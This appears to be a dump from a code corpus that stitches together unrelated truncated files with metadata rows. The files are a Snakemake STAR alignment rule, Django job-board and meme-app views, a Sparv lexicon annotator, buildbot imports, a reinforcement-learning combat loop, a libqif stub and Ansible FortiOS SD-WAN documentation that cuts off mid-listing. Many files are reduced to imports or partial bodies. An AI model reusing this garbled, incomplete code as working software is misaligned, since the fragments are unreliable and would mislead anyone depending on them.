# This module runs the second pass of the STAR aligner 2 path
# strategy. The goal is to align reads taking in account splice
# junction found in the fist pass..
#
# Inputs:
# - sample_trim.fastq.gz
# - splicing junction files (.tab)
#
# Output:
# - aligned reads
# - logs for follow up and debuging if needed
#
# Parameters:
# No fancy parameters needed, only the threads number is specified.
rule star_se_SP:
input:
# fake input
flag = ancient(config["REF"] + "REindexing_done.txt"),
R1 = config["TRIMMED"] + "{samples}_trim.fastq.gz",
genomeDir = ancient(config["REF"])
output:
bam = config["MAP"] + "{samples}_sorted.bam.gz"
params:
prefix = config["MAP"] + "{samples}.",
tmp = config["MAP"] + "SP/" + "{samples}_sp_STAR_TMP",
bind = config["BIND"],
cont = config["CONT"]
benchmark:
"benchmarks/star_SP/{samples}.tsv"
message : "Running STAR second pass with {input.R1}. \n"
shell:
"""
singularity exec -B {params.bind} {params.cont} \
STAR \
--runThreadN 10 \
--genomeDir {input.genomeDir} \
--readFilesIn {input.R1} \
--outSAMtype BAM SortedByCoordinate \
--outFileNamePrefix {params.prefix} \
--outStd BAM_SortedByCoordinate \
--outTmpDir {params.tmp} \
--scoreGap 0 \
--scoreGapNoncan -8 \
--scoreGapGCAG -4 \
--scoreGapATAC -8 \
--scoreGenomicLengthLog2scale -0.25 \
--scoreDelOpen -2 \
--scoreDelBase -2 \
--scoreInsOpen -2 \
--scoreInsBase -2 \
--scoreStitchSJshift 1 \
--readFilesCommand zcat | gzip --stdout > {output.bam}
"""
| 34.421053 | 73 | 0.5316 |
6a36b0c35f3000da705fd087f744d451ba48d8fd
| 531 |
py
|
Python
|
Udemy/REST-Django-VueJS/C3-practice/03-demo/job_board/jobs/models.py
|
runzezhang/MOOCs
|
8df8c7adc5af3d7b085be01ae9b6963fe33acd68
|
[
"Apache-2.0"
] | 3 |
2019-04-05T18:59:53.000Z
|
2020-09-24T09:05:46.000Z
|
Udemy/REST-Django-VueJS/C3-practice/03-demo/job_board/jobs/models.py
|
runzezhang/MOOCs
|
8df8c7adc5af3d7b085be01ae9b6963fe33acd68
|
[
"Apache-2.0"
] | null | null | null |
Udemy/REST-Django-VueJS/C3-practice/03-demo/job_board/jobs/models.py
|
runzezhang/MOOCs
|
8df8c7adc5af3d7b085be01ae9b6963fe33acd68
|
[
"Apache-2.0"
] | 1 |
2019-02-10T13:35:36.000Z
|
2019-02-10T13:35:36.000Z
|
from django.db import models
| 31.235294 | 52 | 0.73823 |
6a3701a8c1a4900d3599d12821235a51d12e4737
| 4,926 |
py
|
Python
|
memeapp/views.py
|
barbaramootian/Memes-app
|
4ffa2da997758ee4f35dc21e755e3db242b8654f
|
[
"MIT",
"Unlicense"
] | null | null | null |
memeapp/views.py
|
barbaramootian/Memes-app
|
4ffa2da997758ee4f35dc21e755e3db242b8654f
|
[
"MIT",
"Unlicense"
] | null | null | null |
memeapp/views.py
|
barbaramootian/Memes-app
|
4ffa2da997758ee4f35dc21e755e3db242b8654f
|
[
"MIT",
"Unlicense"
] | null | null | null |
from django.shortcuts import render,redirect
from django.contrib.auth.models import User
from django.contrib import messages
from .forms import PictureUploadForm,CommentForm
from .models import Image,Profile,Likes,Comments
from django.contrib.auth.decorators import login_required
from django.contrib .auth import authenticate,login,logout
from django.contrib.auth.forms import UserCreationForm
from datetime import datetime
def search(request):
title = "Search"
if 'search_query' in request.GET and request.GET["search_query"]:
search_term = request.GET.get("search_query").lower()
searched_results = Image.search_image(search_term)
message = f"{search_term}"
context = {'message': message, 'results': searched_results, 'title': title}
return render(request, 'memeapp/search.html', context)
else:
messages.error(request, "You haven't searched for any term")
message = "You haven't searched for any term"
return render(request, 'memeapp/search.html', {"message": message})
| 35.695652 | 108 | 0.664434 |
6a3712991b980a6711c1dba6adf131ce5c5af892
| 4,997 |
py
|
Python
|
sparv/modules/hist/diapivot.py
|
spraakbanken/sparv-pipeline
|
7293d42c577afdaf01ce8a936743f8b83d6eb962
|
[
"MIT"
] | 17 |
2018-09-21T07:01:45.000Z
|
2022-02-24T23:26:49.000Z
|
sparv/modules/hist/diapivot.py
|
spraakbanken/sparv-pipeline
|
7293d42c577afdaf01ce8a936743f8b83d6eb962
|
[
"MIT"
] | 146 |
2018-11-13T19:13:25.000Z
|
2022-03-31T09:57:56.000Z
|
sparv/modules/hist/diapivot.py
|
spraakbanken/sparv-pipeline
|
7293d42c577afdaf01ce8a936743f8b83d6eb962
|
[
"MIT"
] | 5 |
2019-02-14T00:50:38.000Z
|
2021-03-29T15:37:41.000Z
|
"""Create diapivot annotation."""
import logging
import pickle
import xml.etree.ElementTree as etree
import sparv.util as util
from sparv import Annotation, Model, ModelOutput, Output, annotator, modelbuilder
log = logging.getLogger(__name__)
PART_DELIM1 = "^1"
# @annotator("Diapivot annotation", language=["swe-1800"])
def diapivot_annotate(out: Output = Output("<token>:hist.diapivot", description="SALDO IDs corresponding to lemgrams"),
lemgram: Annotation = Annotation("<token>:saldo.lemgram"),
model: Model = Model("hist/diapivot.pickle")):
"""Annotate each lemgram with its corresponding saldo_id according to model.
Args:
out (str, optional): Resulting annotation file.
Defaults to Output("<token>:hist.diapivot", description="SALDO IDs corresponding to lemgrams").
lemgram (str, optional): Existing lemgram annotation. Defaults to Annotation("<token>:saldo.lemgram").
model (str, optional): Crosslink model. Defaults to Model("hist/diapivot.pickle").
"""
lexicon = PivotLexicon(model)
lemgram_annotation = list(lemgram.read())
out_annotation = []
for lemgrams in lemgram_annotation:
saldo_ids = []
for lemgram in lemgrams.split(util.DELIM):
s_i = lexicon.get_exactMatch(lemgram)
if s_i:
saldo_ids += [s_i]
out_annotation.append(util.AFFIX + util.DELIM.join(set(saldo_ids)) + util.AFFIX if saldo_ids else util.AFFIX)
out.write(out_annotation)
# @modelbuilder("Diapivot model", language=["swe"])
def build_diapivot(out: ModelOutput = ModelOutput("hist/diapivot.pickle")):
"""Download diapivot XML dictionary and save as a pickle file."""
# Download diapivot.xml
xml_model = Model("hist/diapivot.xml")
xml_model.download("https://svn.spraakdata.gu.se/sb-arkiv/pub/lmf/diapivot/diapivot.xml")
# Create pickle file
xml_lexicon = read_xml(xml_model.path)
log.info("Saving cross lexicon in Pickle format")
picklex = {}
for lem in xml_lexicon:
lemgrams = []
for saldo, match in list(xml_lexicon[lem].items()):
lemgrams.append(PART_DELIM1.join([saldo, match]))
picklex[lem] = sorted(lemgrams)
out.write_pickle(picklex)
# Clean up
xml_model.remove()
################################################################################
# Auxiliaries
################################################################################
def read_xml(xml):
"""Read the XML version of crosslinked lexicon."""
log.info("Reading XML lexicon")
lexicon = {}
context = etree.iterparse(xml, events=("start", "end")) # "start" needed to save reference to root element
context = iter(context)
_event, root = next(context)
for event, elem in context:
if event == "end":
if elem.tag == 'LexicalEntry':
lemma = elem.find("Lemma")
dalin, saldo = [], ''
for form in lemma.findall("FormRepresentation"):
cat = _findval(form, "category")
lem = _findval(form, "lemgram")
if cat == "modern":
saldo = lem
else:
match = _findval(form, "match")
dalin += [(lem, match)]
[lexicon.update({d: {'saldo': saldo, 'match': m}}) for (d, m) in dalin]
# Done parsing section. Clear tree to save memory
if elem.tag in ['LexicalEntry', 'frame', 'resFrame']:
root.clear()
testwords = ["tigerhjerta..nn.1",
"lgland..nn.1",
"gud..nn.1"]
util.test_lexicon(lexicon, testwords)
log.info("OK, read")
return lexicon
| 33.313333 | 119 | 0.58295 |
6a37f82fb39de7a27271cf8fb84d1b4b6b384c9f
| 534 |
py
|
Python
|
src/xbot/util/path.py
|
xinyang178/xbot
|
dad1fc67062dc6fd21802899fd68f7eb91c96569
|
[
"MIT"
] | 77 |
2020-10-27T12:19:01.000Z
|
2022-03-16T09:13:17.000Z
|
src/xbot/util/path.py
|
xinyang178/xbot
|
dad1fc67062dc6fd21802899fd68f7eb91c96569
|
[
"MIT"
] | 7 |
2020-12-09T14:05:07.000Z
|
2021-04-28T02:37:05.000Z
|
src/xbot/util/path.py
|
xinyang178/xbot
|
dad1fc67062dc6fd21802899fd68f7eb91c96569
|
[
"MIT"
] | 45 |
2020-09-24T07:28:32.000Z
|
2022-03-03T17:09:04.000Z
|
import os
| 24.272727 | 87 | 0.666667 |
6a3848493b2b327c8b213a833273765a92b0f3b9
| 274 |
py
|
Python
|
home/website/wagtail_hooks.py
|
HackSoftware/hackconf.bg
|
ab3cc9fcdccf8991098553e0374103e3a241ce50
|
[
"MIT"
] | 12 |
2017-03-29T11:55:20.000Z
|
2022-03-29T20:03:41.000Z
|
kdl_wagtail/wagtail_hooks.py
|
kingsdigitallab/archetype-django
|
6315c8f38e873e2d3b2d99fcfd47d01ce0ae35bc
|
[
"MIT"
] | 8 |
2020-06-05T18:16:24.000Z
|
2021-09-07T23:53:11.000Z
|
kdl_wagtail/wagtail_hooks.py
|
kingsdigitallab/archetype-django
|
6315c8f38e873e2d3b2d99fcfd47d01ce0ae35bc
|
[
"MIT"
] | 2 |
2018-03-31T15:06:55.000Z
|
2019-06-25T16:22:08.000Z
|
from django.utils.html import format_html
from wagtail.wagtailcore import hooks
| 19.571429 | 45 | 0.624088 |
6a388679dce82d3f7e5c312799aab790d1280f39
| 440 |
py
|
Python
|
src/reporter/tests/test_api.py
|
msgis/ngsi-timeseries-api
|
5cc7a8beab748cecfd5fba61740f3730361d4e31
|
[
"MIT"
] | null | null | null |
src/reporter/tests/test_api.py
|
msgis/ngsi-timeseries-api
|
5cc7a8beab748cecfd5fba61740f3730361d4e31
|
[
"MIT"
] | null | null | null |
src/reporter/tests/test_api.py
|
msgis/ngsi-timeseries-api
|
5cc7a8beab748cecfd5fba61740f3730361d4e31
|
[
"MIT"
] | null | null | null |
from conftest import QL_URL
import requests
| 29.333333 | 53 | 0.543182 |
6a38ce0ec26e60d5ad5f137d860bd186bef4c8e7
| 1,981 |
py
|
Python
|
zorg/buildbot/conditions/FileConditions.py
|
dyung/llvm-zorg
|
42cd139968388b14323975647faf322c99945986
|
[
"Apache-2.0"
] | 27 |
2019-01-15T03:03:58.000Z
|
2022-03-22T23:31:36.000Z
|
zorg/buildbot/conditions/FileConditions.py
|
dyung/llvm-zorg
|
42cd139968388b14323975647faf322c99945986
|
[
"Apache-2.0"
] | 21 |
2020-05-29T01:12:26.000Z
|
2022-03-29T20:06:22.000Z
|
zorg/buildbot/conditions/FileConditions.py
|
dyung/llvm-zorg
|
42cd139968388b14323975647faf322c99945986
|
[
"Apache-2.0"
] | 38 |
2019-02-10T02:46:33.000Z
|
2022-03-26T10:27:29.000Z
|
from buildbot.process.remotecommand import RemoteCommand
from buildbot.interfaces import WorkerTooOldError
import stat
| 30.476923 | 78 | 0.655729 |
6a39601bd5d34aa0ef10ce85dcff9883e1a2620c
| 6,349 |
py
|
Python
|
gym_combat/gym_combat/envs/main.py
|
refaev/combat_gym
|
f02fcf98e95a1dda29cdddd4ae271de3e18ea3bf
|
[
"MIT"
] | null | null | null |
gym_combat/gym_combat/envs/main.py
|
refaev/combat_gym
|
f02fcf98e95a1dda29cdddd4ae271de3e18ea3bf
|
[
"MIT"
] | null | null | null |
gym_combat/gym_combat/envs/main.py
|
refaev/combat_gym
|
f02fcf98e95a1dda29cdddd4ae271de3e18ea3bf
|
[
"MIT"
] | null | null | null |
from matplotlib import style
from tqdm import tqdm
style.use("ggplot")
from gym_combat.envs.Arena.CState import State
from gym_combat.envs.Arena.Entity import Entity
from gym_combat.envs.Arena.Environment import Environment, Episode
from gym_combat.envs.Common.constants import *
from gym_combat.envs.Qtable import Qtable_DecisionMaker
from gym_combat.envs.DQN import DQNAgent_keras
from gym_combat.envs.Greedy import Greedy_player
import matplotlib.pyplot as plt
if __name__ == '__main__':
env = Environment(IS_TRAINING)
print("Starting Blue player")
blue_decision_maker = DQNAgent_keras.DQNAgent_keras()
#blue_decision_maker = DQNAgent_keras.DQNAgent_keras(UPDATE_CONTEXT=True, path_model_to_load='conv1(6_6_1_256)_conv2(4_4_256_128)_conv3(3_3_128_128)_flatten_fc__blue_202001_ 0.95max_ -0.04avg_ -3.10min__1620558885.model')
print("Starting red player")
### Red Decision Maker
red_decision_maker = Greedy_player.Greedy_player()
env.blue_player = Entity(blue_decision_maker)
env.red_player = Entity(red_decision_maker)
print_start_of_game_info(blue_decision_maker, red_decision_maker)
NUM_OF_EPISODES = env.NUMBER_OF_EPISODES
for episode in tqdm(range(1, NUM_OF_EPISODES + 1), ascii=True, unit='episodes'):
EVALUATE = evaluate(episode)
current_episode = Episode(episode, EVALUATE, show_always=False if IS_TRAINING else True)
# set new start position for the players
env.reset_game(episode)
# get observation
observation_for_blue_s0: State = env.get_observation_for_blue()
action_blue = -1
# initialize the decision_makers for the players
blue_decision_maker.set_initial_state(observation_for_blue_s0, episode)
#red_decision_maker.set_initial_state(observation_for_red_s0, episode) # for non-greedy players
blue_won_the_game = False
red_won_the_game = False
for steps_current_game in range(1, MAX_STEPS_PER_EPISODE + 1):
##### Blue's turn! #####
observation_for_blue_s0: State = env.get_observation_for_blue()
current_episode.print_episode(env, steps_current_game)
action_blue: AgentAction = blue_decision_maker.get_action(observation_for_blue_s0, EVALUATE)
env.take_action(Color.Blue, action_blue) # take the action!
current_episode.print_episode(env, steps_current_game)
current_episode.is_terminal = (env.compute_terminal(whos_turn=Color.Blue) is not WinEnum.NoWin)
if current_episode.is_terminal:# Blue won the game!
blue_won_the_game=True
else:
##### Red's turn! #####
observation_for_red_s0: State = env.get_observation_for_red()
action_red: AgentAction = red_decision_maker.get_action(observation_for_red_s0, EVALUATE)
env.take_action(Color.Red, action_red) # take the action!
current_episode.is_terminal = (env.compute_terminal(whos_turn=Color.Red) is not WinEnum.NoWin)
if current_episode.is_terminal: # Blue won the game!
red_won_the_game = True
current_episode.print_episode(env, steps_current_game)
reward_step_blue, reward_step_red = env.handle_reward(steps_current_game)
current_episode.episode_reward_red += reward_step_red
current_episode.episode_reward_blue += reward_step_blue
observation_for_blue_s1: State = env.get_observation_for_blue()
blue_decision_maker.update_context(observation_for_blue_s0, action_blue, reward_step_blue, observation_for_blue_s1,
current_episode.is_terminal, EVALUATE)
if steps_current_game == MAX_STEPS_PER_EPISODE:
# if we exited the loop because we reached MAX_STEPS_PER_EPISODE
current_episode.is_terminal = True
if blue_won_the_game or red_won_the_game:
break
# for statistics
env.update_win_counters(steps_current_game)
env.data_for_statistics(current_episode.episode_reward_blue, current_episode.episode_reward_red, steps_current_game, blue_decision_maker.get_epsolon())
env.evaluate_info(EVALUATE, episode, steps_current_game, blue_decision_maker.get_epsolon())
if current_episode.episode_number % SAVE_STATS_EVERY == 0:
if False:#blue_decision_maker.type()== AgentType.DQN_keras or blue_decision_maker.type() == AgentType.DQN_basic:
blue_decision_maker._decision_maker.print_model(observation_for_blue_s0, episode, "conv")#env.save_folder_path)
# print info of episode:
current_episode.print_info_of_episode(env, steps_current_game, blue_decision_maker.get_epsolon(), episode)
env.end_run()
if blue_decision_maker.type() == AgentType.DQN_keras or blue_decision_maker.type() == AgentType.DQN_basic:
blue_decision_maker._decision_maker.print_model(observation_for_blue_s0, episode, env.save_folder_path)
| 42.326667 | 229 | 0.723106 |
6a3afdedc7e9000d89eef5155bbd1cbb9eab9c08
| 4,132 |
py
|
Python
|
libqif/core/hyper.py
|
ramongonze/libqif
|
57be74a2342a303da5415a3d787855b8115e58f8
|
[
"MIT"
] | 2 |
2021-10-16T17:34:58.000Z
|
2021-11-16T16:15:13.000Z
|
libqif/core/hyper.py
|
ramongonze/libqif
|
57be74a2342a303da5415a3d787855b8115e58f8
|
[
"MIT"
] | null | null | null |
libqif/core/hyper.py
|
ramongonze/libqif
|
57be74a2342a303da5415a3d787855b8115e58f8
|
[
"MIT"
] | null | null | null |
"""Hyper-distributions."""
from libqif.core.secrets import Secrets
from libqif.core.channel import Channel
from numpy import array, arange, zeros
from numpy import delete as npdelete
| 37.225225 | 114 | 0.609874 |
6a3b1a3262144d987829d88570c7ef9a23bfd4a5
| 53,568 |
py
|
Python
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_virtual_wan_link.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 17 |
2017-06-07T23:15:01.000Z
|
2021-08-30T14:32:36.000Z
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_virtual_wan_link.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 32 |
2018-10-09T04:13:42.000Z
|
2020-05-11T07:20:28.000Z
|
ansible/venv/lib/python2.7/site-packages/ansible/modules/network/fortios/fortios_system_virtual_wan_link.py
|
gvashchenkolineate/gvashchenkolineate_infra_trytravis
|
0fb18850afe0d8609693ba4b23f29c7cda17d97f
|
[
"MIT"
] | 11 |
2018-10-09T00:14:53.000Z
|
2021-11-03T10:54:09.000Z
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_virtual_wan_link
short_description: Configure redundant internet connections using SD-WAN (formerly virtual WAN link) in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify system feature and virtual_wan_link category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
version_added: 2.9
system_virtual_wan_link:
description:
- Configure redundant internet connections using SD-WAN (formerly virtual WAN link).
default: null
type: dict
suboptions:
fail_alert_interfaces:
description:
- Physical interfaces that will be alerted.
type: list
suboptions:
name:
description:
- Physical interface name. Source system.interface.name.
required: true
type: str
fail_detect:
description:
- Enable/disable SD-WAN Internet connection status checking (failure detection).
type: str
choices:
- enable
- disable
health_check:
description:
- SD-WAN status checking or health checking. Identify a server on the Internet and determine how SD-WAN verifies that the FortiGate can
communicate with it.
type: list
suboptions:
addr_mode:
description:
- Address mode (IPv4 or IPv6).
type: str
choices:
- ipv4
- ipv6
failtime:
description:
- Number of failures before server is considered lost (1 - 3600).
type: int
http_agent:
description:
- String in the http-agent field in the HTTP header.
type: str
http_get:
description:
- URL used to communicate with the server if the protocol if the protocol is HTTP.
type: str
http_match:
description:
- Response string expected from the server if the protocol is HTTP.
type: str
interval:
description:
- Status check interval, or the time between attempting to connect to the server (1 - 3600 sec).
type: int
members:
description:
- Member sequence number list.
type: list
suboptions:
seq_num:
description:
- Member sequence number. Source system.virtual-wan-link.members.seq-num.
type: int
name:
description:
- Status check or health check name.
required: true
type: str
packet_size:
description:
- Packet size of a twamp test session,
type: int
password:
description:
- Twamp controller password in authentication mode
type: str
port:
description:
- Port number used to communicate with the server over the selected protocol.
type: int
protocol:
description:
- Protocol used to determine if the FortiGate can communicate with the server.
type: str
choices:
- ping
- tcp-echo
- udp-echo
- http
- twamp
- ping6
recoverytime:
description:
- Number of successful responses received before server is considered recovered (1 - 3600).
type: int
security_mode:
description:
- Twamp controller security mode.
type: str
choices:
- none
- authentication
server:
description:
- IP address or FQDN name of the server.
type: str
sla:
description:
- Service level agreement (SLA).
type: list
suboptions:
id:
description:
- SLA ID.
required: true
type: int
jitter_threshold:
description:
- Jitter for SLA to make decision in milliseconds. (0 - 10000000).
type: int
latency_threshold:
description:
- Latency for SLA to make decision in milliseconds. (0 - 10000000).
type: int
link_cost_factor:
description:
- Criteria on which to base link selection.
type: str
choices:
- latency
- jitter
- packet-loss
packetloss_threshold:
description:
- Packet loss for SLA to make decision in percentage. (0 - 100).
type: int
threshold_alert_jitter:
description:
- Alert threshold for jitter (ms).
type: int
threshold_alert_latency:
description:
- Alert threshold for latency (ms).
type: int
threshold_alert_packetloss:
description:
- Alert threshold for packet loss (percentage).
type: int
threshold_warning_jitter:
description:
- Warning threshold for jitter (ms).
type: int
threshold_warning_latency:
description:
- Warning threshold for latency (ms).
type: int
threshold_warning_packetloss:
description:
- Warning threshold for packet loss (percentage).
type: int
update_cascade_interface:
description:
- Enable/disable update cascade interface.
type: str
choices:
- enable
- disable
update_static_route:
description:
- Enable/disable updating the static route.
type: str
choices:
- enable
- disable
load_balance_mode:
description:
- Algorithm or mode to use for load balancing Internet traffic to SD-WAN members.
type: str
choices:
- source-ip-based
- weight-based
- usage-based
- source-dest-ip-based
- measured-volume-based
members:
description:
- Physical FortiGate interfaces added to the virtual-wan-link.
type: list
suboptions:
comment:
description:
- Comments.
type: str
gateway:
description:
- The default gateway for this interface. Usually the default gateway of the Internet service provider that this interface is
connected to.
type: str
gateway6:
description:
- IPv6 gateway.
type: str
ingress_spillover_threshold:
description:
- Ingress spillover threshold for this interface (0 - 16776000 kbit/s). When this traffic volume threshold is reached, new
sessions spill over to other interfaces in the SD-WAN.
type: int
interface:
description:
- Interface name. Source system.interface.name.
type: str
priority:
description:
- Priority of the interface (0 - 4294967295). Used for SD-WAN rules or priority rules.
type: int
seq_num:
description:
- Sequence number(1-255).
type: int
source:
description:
- Source IP address used in the health-check packet to the server.
type: str
source6:
description:
- Source IPv6 address used in the health-check packet to the server.
type: str
spillover_threshold:
description:
- Egress spillover threshold for this interface (0 - 16776000 kbit/s). When this traffic volume threshold is reached, new sessions
spill over to other interfaces in the SD-WAN.
type: int
status:
description:
- Enable/disable this interface in the SD-WAN.
type: str
choices:
- disable
- enable
volume_ratio:
description:
- Measured volume ratio (this value / sum of all values = percentage of link volume, 0 - 255).
type: int
weight:
description:
- Weight of this interface for weighted load balancing. (0 - 255) More traffic is directed to interfaces with higher weights.
type: int
service:
description:
- Create SD-WAN rules or priority rules (also called services) to control how sessions are distributed to physical interfaces in the
SD-WAN.
type: list
suboptions:
addr_mode:
description:
- Address mode (IPv4 or IPv6).
type: str
choices:
- ipv4
- ipv6
bandwidth_weight:
description:
- Coefficient of reciprocal of available bidirectional bandwidth in the formula of custom-profile-1.
type: int
default:
description:
- Enable/disable use of SD-WAN as default service.
type: str
choices:
- enable
- disable
dscp_forward:
description:
- Enable/disable forward traffic DSCP tag.
type: str
choices:
- enable
- disable
dscp_forward_tag:
description:
- Forward traffic DSCP tag.
type: str
dscp_reverse:
description:
- Enable/disable reverse traffic DSCP tag.
type: str
choices:
- enable
- disable
dscp_reverse_tag:
description:
- Reverse traffic DSCP tag.
type: str
dst:
description:
- Destination address name.
type: list
suboptions:
name:
description:
- Address or address group name. Source firewall.address.name firewall.addrgrp.name.
required: true
type: str
dst_negate:
description:
- Enable/disable negation of destination address match.
type: str
choices:
- enable
- disable
dst6:
description:
- Destination address6 name.
type: list
suboptions:
name:
description:
- Address6 or address6 group name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
end_port:
description:
- End destination port number.
type: int
gateway:
description:
- Enable/disable SD-WAN service gateway.
type: str
choices:
- enable
- disable
groups:
description:
- User groups.
type: list
suboptions:
name:
description:
- Group name. Source user.group.name.
required: true
type: str
health_check:
description:
- Health check. Source system.virtual-wan-link.health-check.name.
type: str
hold_down_time:
description:
- Waiting period in seconds when switching from the back-up member to the primary member (0 - 10000000).
type: int
id:
description:
- Priority rule ID (1 - 4000).
required: true
type: int
input_device:
description:
- Source interface name.
type: list
suboptions:
name:
description:
- Interface name. Source system.interface.name.
required: true
type: str
internet_service:
description:
- Enable/disable use of Internet service for application-based load balancing.
type: str
choices:
- enable
- disable
internet_service_ctrl:
description:
- Control-based Internet Service ID list.
type: list
suboptions:
id:
description:
- Control-based Internet Service ID.
required: true
type: int
internet_service_ctrl_group:
description:
- Control-based Internet Service group list.
type: list
suboptions:
name:
description:
- Control-based Internet Service group name. Source application.group.name.
required: true
type: str
internet_service_custom:
description:
- Custom Internet service name list.
type: list
suboptions:
name:
description:
- Custom Internet service name. Source firewall.internet-service-custom.name.
required: true
type: str
internet_service_custom_group:
description:
- Custom Internet Service group list.
type: list
suboptions:
name:
description:
- Custom Internet Service group name. Source firewall.internet-service-custom-group.name.
required: true
type: str
internet_service_group:
description:
- Internet Service group list.
type: list
suboptions:
name:
description:
- Internet Service group name. Source firewall.internet-service-group.name.
required: true
type: str
internet_service_id:
description:
- Internet service ID list.
type: list
suboptions:
id:
description:
- Internet service ID. Source firewall.internet-service.id.
required: true
type: int
jitter_weight:
description:
- Coefficient of jitter in the formula of custom-profile-1.
type: int
latency_weight:
description:
- Coefficient of latency in the formula of custom-profile-1.
type: int
link_cost_factor:
description:
- Link cost factor.
type: str
choices:
- latency
- jitter
- packet-loss
- inbandwidth
- outbandwidth
- bibandwidth
- custom-profile-1
link_cost_threshold:
description:
- Percentage threshold change of link cost values that will result in policy route regeneration (0 - 10000000).
type: int
member:
description:
- Member sequence number.
type: int
mode:
description:
- Control how the priority rule sets the priority of interfaces in the SD-WAN.
type: str
choices:
- auto
- manual
- priority
- sla
name:
description:
- Priority rule name.
type: str
packet_loss_weight:
description:
- Coefficient of packet-loss in the formula of custom-profile-1.
type: int
priority_members:
description:
- Member sequence number list.
type: list
suboptions:
seq_num:
description:
- Member sequence number. Source system.virtual-wan-link.members.seq-num.
type: int
protocol:
description:
- Protocol number.
type: int
quality_link:
description:
- Quality grade.
type: int
route_tag:
description:
- IPv4 route map route-tag.
type: int
sla:
description:
- Service level agreement (SLA).
type: list
suboptions:
health_check:
description:
- Virtual WAN Link health-check. Source system.virtual-wan-link.health-check.name.
type: str
id:
description:
- SLA ID.
type: int
src:
description:
- Source address name.
type: list
suboptions:
name:
description:
- Address or address group name. Source firewall.address.name firewall.addrgrp.name.
required: true
type: str
src_negate:
description:
- Enable/disable negation of source address match.
type: str
choices:
- enable
- disable
src6:
description:
- Source address6 name.
type: list
suboptions:
name:
description:
- Address6 or address6 group name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
start_port:
description:
- Start destination port number.
type: int
status:
description:
- Enable/disable SD-WAN service.
type: str
choices:
- enable
- disable
tos:
description:
- Type of service bit pattern.
type: str
tos_mask:
description:
- Type of service evaluated bits.
type: str
users:
description:
- User name.
type: list
suboptions:
name:
description:
- User name. Source user.local.name.
required: true
type: str
status:
description:
- Enable/disable SD-WAN.
type: str
choices:
- disable
- enable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure redundant internet connections using SD-WAN (formerly virtual WAN link).
fortios_system_virtual_wan_link:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
system_virtual_wan_link:
fail_alert_interfaces:
-
name: "default_name_4 (source system.interface.name)"
fail_detect: "enable"
health_check:
-
addr_mode: "ipv4"
failtime: "8"
http_agent: "<your_own_value>"
http_get: "<your_own_value>"
http_match: "<your_own_value>"
interval: "12"
members:
-
seq_num: "14 (source system.virtual-wan-link.members.seq-num)"
name: "default_name_15"
packet_size: "16"
password: "<your_own_value>"
port: "18"
protocol: "ping"
recoverytime: "20"
security_mode: "none"
server: "192.168.100.40"
sla:
-
id: "24"
jitter_threshold: "25"
latency_threshold: "26"
link_cost_factor: "latency"
packetloss_threshold: "28"
threshold_alert_jitter: "29"
threshold_alert_latency: "30"
threshold_alert_packetloss: "31"
threshold_warning_jitter: "32"
threshold_warning_latency: "33"
threshold_warning_packetloss: "34"
update_cascade_interface: "enable"
update_static_route: "enable"
load_balance_mode: "source-ip-based"
members:
-
comment: "Comments."
gateway: "<your_own_value>"
gateway6: "<your_own_value>"
ingress_spillover_threshold: "42"
interface: "<your_own_value> (source system.interface.name)"
priority: "44"
seq_num: "45"
source: "<your_own_value>"
source6: "<your_own_value>"
spillover_threshold: "48"
status: "disable"
volume_ratio: "50"
weight: "51"
service:
-
addr_mode: "ipv4"
bandwidth_weight: "54"
default: "enable"
dscp_forward: "enable"
dscp_forward_tag: "<your_own_value>"
dscp_reverse: "enable"
dscp_reverse_tag: "<your_own_value>"
dst:
-
name: "default_name_61 (source firewall.address.name firewall.addrgrp.name)"
dst_negate: "enable"
dst6:
-
name: "default_name_64 (source firewall.address6.name firewall.addrgrp6.name)"
end_port: "65"
gateway: "enable"
groups:
-
name: "default_name_68 (source user.group.name)"
health_check: "<your_own_value> (source system.virtual-wan-link.health-check.name)"
hold_down_time: "70"
id: "71"
input_device:
-
name: "default_name_73 (source system.interface.name)"
internet_service: "enable"
internet_service_ctrl:
-
id: "76"
internet_service_ctrl_group:
-
name: "default_name_78 (source application.group.name)"
internet_service_custom:
-
name: "default_name_80 (source firewall.internet-service-custom.name)"
internet_service_custom_group:
-
name: "default_name_82 (source firewall.internet-service-custom-group.name)"
internet_service_group:
-
